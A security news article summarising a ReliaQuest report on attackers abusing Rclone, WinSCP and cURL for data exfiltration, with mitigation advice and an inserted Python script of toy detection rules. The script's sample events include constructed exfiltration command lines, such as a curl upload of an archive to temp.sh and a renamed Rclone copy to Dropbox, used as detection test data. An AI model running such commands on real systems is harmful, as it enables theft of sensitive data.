Cybercriminals have significantly increased their use of data-exfiltration tools, which are highly effective for stealing sensitive data and evading detection.
This was revealed in a recent report by ReliaQuest, which highlights the evolving strategies of threat actors in the digital landscape. The report, covering incidents from September 2023 to July 2024, examined the tools that have become increasingly popular among malicious actors.
Weapon of Choice
Rclone, an open-source command-line utility, has emerged as a favored tool for data exfiltration, appearing in 57% of incidents investigated by ReliaQuest. Initially designed for legitimate use in synchronizing files across various cloud storage platforms, Rclone’s versatility and efficiency have made it a weapon of choice for threat actors. Its ability to integrate with multiple cloud services such as Google Drive, Amazon S3, and Dropbox allows cybercriminals to transfer large volumes of data quickly, complicating the task of defenders.
ReliaQuest responded to a double extortion attack in one instance, in which the threat actors used a disguised Rclone binary to exfiltrate data to Dropbox. The attackers successfully masked the tool, bypassing static detection measures, and exfiltrated significant amounts of sensitive information before deploying ransomware.
Trusted Tools Turned Malicious
Two other popular (and reputable) IT tools, WinSCP and cURL, have also been exploited maliciously. WinSCP, an open-source file transfer utility for Windows, is prized for its user-friendly interface and powerful scripting capabilities. Malefactors leverage its portability and automation features to exfiltrate data stealthily, often without raising suspicion due to its widespread legitimate use.
cURL, a command-line tool for transferring data via URLs, is another commonly used tool in data-exfiltration operations. Despite being less reliable for large-scale exfiltration than Rclone and WinSCP, cURL’s cross-platform availability and integration with web services make it an effective tool for stealing targeted information. For instance, the Black Basta ransomware group was observed using cURL to exfiltrate sensitive data from an organization via the cloud storage domain temp[.]sh.
The Rise of Atypical and Emerging Tools
While Rclone, WinSCP, and cURL dominate the data-exfiltration landscape, the report also identifies less common but still impactful tools that can support both large- and small-scale operations. Although used less often, these tools pose major risks because of their legitimate functions and the ease with which they can be weaponized, so organizations must stay alert to them as well.
ReliaQuest identified several tools, including MegaSync, Restic, and FileZilla, that, while not as commonly seen, have been used in past incidents and occasionally resurface. Additionally, tools capable of exfiltrating small amounts of data and the ongoing threat of custom exfiltration tools should not be overlooked.
The report also warns of the growing use of Remote Monitoring and Management (RMM) software in data-exfiltration operations. RMM tools, commonly used by IT teams to manage infrastructure, are being exploited by cybercriminals to blend in with normal operations and evade detection.
Understanding the wide range of techniques used in these attacks is key to reducing the risk of data exfiltration by threat actors or insider threats. Due to these methods’ complexity, familiarity with well-known and emerging tools for data exfiltration is vital.
Recommendations and Best Practices
ReliaQuest offers the following measures to help prevent or mitigate the impact of data-exfiltration attempts:
- Application Control: Enforce application controls, such as Group Policy Objects (GPOs), to prevent the execution of unauthorized applications, particularly those capable of exfiltrating data.
- Restrict Access to Commercial Services: Threat actors often exploit commercial services to blend in with the target environment and evade detection. In many incidents handled by ReliaQuest, services like MEGA cloud storage and Dropbox were used for data exfiltration. Organizations should identify and restrict the use of these services, applying controls through proxies, DNS, or application control for Remote Monitoring and Management (RMM) software.
- Logging and Visibility: Security teams need comprehensive visibility to act effectively. Ensure activity logs from critical infrastructure and the broader environment are forwarded to a centralized location. This allows for implementing correlation-based detection rules, threat investigation, and rapid response to incidents involving exfiltration tools.
- Use of Canary Files: Deploy canary files or folders as decoys within the environment to detect unauthorized operations. These files are designed to appear valuable, luring threat actors into triggering alerts. Implementing canary files helps security teams detect modifications and respond quickly, minimizing potential damage.
- Implement Data Loss Prevention (DLP) Tools: Deploy DLP tools to identify, classify, and monitor sensitive data, protecting it from unauthorized access. DLP tools can integrate with directory services and apply role-based access controls, allowing for the creation of custom policies tailored to specific user groups.
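The logging and visibility recommendation above is only useful if correlation rules actually run over the forwarded telemetry. As an added illustration (not code from ReliaQuest or from the article), the script below applies three toy detection rules to constructed process-creation events: it recognises a renamed Rclone binary by its command-line vocabulary (subcommand, flags, and the remote:path argument form) rather than by file name, which is the gap the disguised-binary case in the report exposes; it flags curl uploads to the services the article names; and it flags WinSCP running in scripting mode. The event schema, field names, flag lists, and service domains (temp.sh from the article; dropbox.com and mega.nz as public domains of the named services) are assumptions, not a particular EDR or SIEM format.

```python
"""Toy correlation rules for exfiltration-tool abuse over process-creation events.

Added example; the events and the ProcEvent schema are constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    image: str            # full path of the executed binary
    cmdline: str
    original_name: str = ""   # PE "OriginalFileName", if the sensor records it (assumed field)


# Vocabulary specific to Rclone's CLI. Matching on this, not on the file name,
# is what still fires when the binary has been renamed.
RCLONE_SUBCMDS = {"copy", "sync", "move", "copyto", "lsd", "lsf"}
RCLONE_FLAGS = {"--config", "--transfers", "--progress", "-P",
                "--no-check-certificate", "--drive-chunk-size"}
# "remote:path" argument form; 2+ chars before the colon rules out Windows drive letters,
# and the lookahead rules out URL schemes such as https://
RCLONE_REMOTE_ARG = re.compile(r"^[A-Za-z0-9_-]{2,}:(?!//)\S*$")

# Destinations the article names; the domains themselves are public knowledge, not from the report.
WATCHED_DOMAINS = ("temp.sh", "dropbox.com", "mega.nz")
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}
WINSCP_SCRIPT_FLAGS = ("/script=", "/command")


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rclone_signals(ev: ProcEvent):
    """Return the Rclone-specific tokens found in the command line (subcommands, flags, remotes)."""
    toks = ev.cmdline.split()
    subs = [t for t in toks[1:] if t in RCLONE_SUBCMDS]          # skip argv[0]
    flags = [t for t in toks if t in RCLONE_FLAGS
             or t.startswith(tuple(f + "=" for f in RCLONE_FLAGS))]
    remotes = [t for t in toks[1:] if RCLONE_REMOTE_ARG.match(t)]
    return subs, flags, remotes


def evaluate(ev: ProcEvent) -> list:
    """Apply the three toy rules; an empty list means nothing fired."""
    alerts = []
    name = basename(ev.image)

    # Rule 1: Rclone syntax, regardless of what the binary is called
    subs, flags, remotes = rclone_signals(ev)
    looks_like_rclone = bool(subs) and (bool(remotes) or bool(flags))
    if looks_like_rclone or ev.original_name.lower() == "rclone.exe":
        if name not in ("rclone.exe", "rclone"):
            alerts.append(f"HIGH disguised Rclone: {name} ran with Rclone syntax {subs + flags + remotes}")
        else:
            alerts.append("MEDIUM Rclone execution (confirm it is an approved sync/backup job)")

    # Rule 2: curl uploading to a watched cloud/file-drop service
    if name in ("curl.exe", "curl"):
        uploading = any(t in CURL_UPLOAD_FLAGS for t in ev.cmdline.split())
        dest = [d for d in WATCHED_DOMAINS if d in ev.cmdline.lower()]
        if uploading and dest:
            alerts.append(f"HIGH curl upload to watched service {dest[0]}")

    # Rule 3: WinSCP driven by a script rather than interactively
    if name in ("winscp.exe", "winscp.com") and any(f in ev.cmdline.lower() for f in WINSCP_SCRIPT_FLAGS):
        alerts.append("MEDIUM WinSCP scripted/unattended transfer")
    return alerts


def scan(events):
    """Return {event index: alerts} for every event that fired at least one rule."""
    findings = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed sample telemetry (hosts, users, paths and command lines are invented)
SAMPLE_EVENTS = [
    # 0: approved backup job, Rclone under its own name -> medium, review only
    ProcEvent("srv-backup01", "svc_backup", r"C:\Tools\rclone\rclone.exe",
              r"rclone.exe sync D:\exports s3backup:corp-exports --config C:\Tools\rclone\rclone.conf",
              "rclone.exe"),
    # 1: renamed binary, Rclone syntax intact -> high (fires on syntax alone, metadata absent)
    ProcEvent("ws-finance07", "jdoe", r"C:\Users\jdoe\AppData\Local\Temp\svchost32.exe",
              r'svchost32.exe copy "C:\Shares\Finance" dbx:upload --transfers 32 -P'),
    # 2: curl fetching a page -> benign
    ProcEvent("ws-dev03", "asmith", r"C:\Windows\System32\curl.exe",
              "curl.exe -s https://example.com/status", "curl.exe"),
    # 3: curl pushing an archive to temp.sh, the pattern the article attributes to Black Basta -> high
    ProcEvent("ws-hr02", "mlee", r"C:\Windows\System32\curl.exe",
              r"curl.exe -T C:\Users\mlee\hr.7z https://temp.sh/", "curl.exe"),
    # 4: WinSCP in scripting mode -> medium
    ProcEvent("ws-it01", "tadmin", r"C:\Program Files\WinSCP\WinSCP.com",
              r"WinSCP.com /script=C:\jobs\push.txt /log=C:\jobs\push.log", "winscp.com"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[i]
        for h in hits:
            print(f"[{ev.host}] {ev.user}: {h}")
```

The point of the first rule is that a file-name or hash match is exactly what a renamed binary defeats; Rclone's argument grammar is far harder for an operator to change without breaking the tool. In a real SIEM the same logic would be expressed in the platform's query language and joined with network telemetry (the proxy or DNS logs the "restrict access" recommendation produces) so that a curl or Rclone process and a connection to an unsanctioned service corroborate each other.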
Staying Ahead of Evolving Threats
As cybercriminals continue to innovate and adapt, staying ahead of these evolving threats requires a proactive and robust security posture. Entities must remain vigilant, regularly update their defenses, and be prepared to respond swiftly to any signs of data exfiltration.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.